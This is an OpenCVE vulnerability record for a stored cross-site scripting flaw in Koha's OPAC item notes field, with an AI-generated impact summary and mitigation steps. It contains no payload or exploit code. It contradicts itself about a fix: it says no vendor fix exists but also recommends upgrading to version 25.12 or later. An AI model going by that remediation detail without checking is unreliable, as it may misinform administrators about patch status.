Description
A stored cross-site scripting (XSS) vulnerability in the OPAC item detail page of Koha Library Management System through 25.11 allows an authenticated remote attacker with edit_items permission to inject arbitrary web scripts via the item public notes field (items.itemnotes).
Published: 2026-06-26
Score: n/a
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A stored cross‑site scripting (XSS) vulnerability exists in the Koha OPAC item detail page. An authenticated attacker who possesses edit_items permission can inject arbitrary web scripts into the item public notes field (items.itemnotes). The injected script will run each time a user views the affected item’s detail page, allowing malicious code to execute within the victim’s browser context.

Affected Systems

Koha Library Management System versions up to and including 25.11, including any deployment that has not applied a patch correcting the OPAC item notes handling mechanism.

Risk and Exploitability

The CVSS score is not stated and the EPSS score is unavailable, so the precise exploit probability is unknown. The flaw is not listed in CISA’s KEV catalog. Although the attack requires an authenticated user with edit_items rights, a compromised or fraudulently obtained account would enable an attacker to persistently store malicious scripts that affect all users who access the item detail page. The lack of publicly cited exploit evidence means the actual exploitation likelihood is uncertain, but the potential to impact all users interacting with the page is significant.

Generated by OpenCVE AI on June 27, 2026 at 00:22 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the official patch or upgrade to a fixed version of Koha (≥25.12) that addresses this vulnerability.
  • Restrict the edit_items permission to trusted staff only, or remove the ability to edit public notes for users who normally have this privilege.
  • Deploy a Content Security Policy that blocks the execution of inline scripts or untrusted JavaScript sources on the OPAC item detail pages to reduce the risk of XSS exploitation.

Generated by OpenCVE AI on June 27, 2026 at 00:22 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Sat, 27 Jun 2026 00:45:00 +0000

Type Values Removed Values Added
Title Authenticated Stored XSS in Koha OPAC Item Public Notes
Weaknesses CWE-79

Fri, 26 Jun 2026 22:00:00 +0000

Type Values Removed Values Added
Description A stored cross-site scripting (XSS) vulnerability in the OPAC item detail page of Koha Library Management System through 25.11 allows an authenticated remote attacker with edit_items permission to inject arbitrary web scripts via the item public notes field (items.itemnotes).
References

Subscriptions

No data.

cve-icon MITRE

Status: PUBLISHED

Assigner: mitre

Published:

Updated: 2026-06-26T21:37:56.281Z

Reserved: 2026-06-07T00:00:00.000Z

Link: CVE-2026-50766

cve-icon Vulnrichment

No data.

cve-icon NVD

No data.

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-27T00:30:05Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')